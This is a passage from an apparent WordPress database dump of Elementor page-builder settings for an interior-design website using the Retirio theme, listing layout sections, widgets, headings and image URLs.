steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4245,4924,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4246,4924,'_elementor_pro_version','3.8.1'),(4247,4925,'_wp_page_template','elementor_header_footer'),(4248,4925,'_elementor_edit_mode','builder'),(4249,4925,'_elementor_template_type','wp-page'),(4250,4925,'_elementor_version','3.8.1'),(4251,4925,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]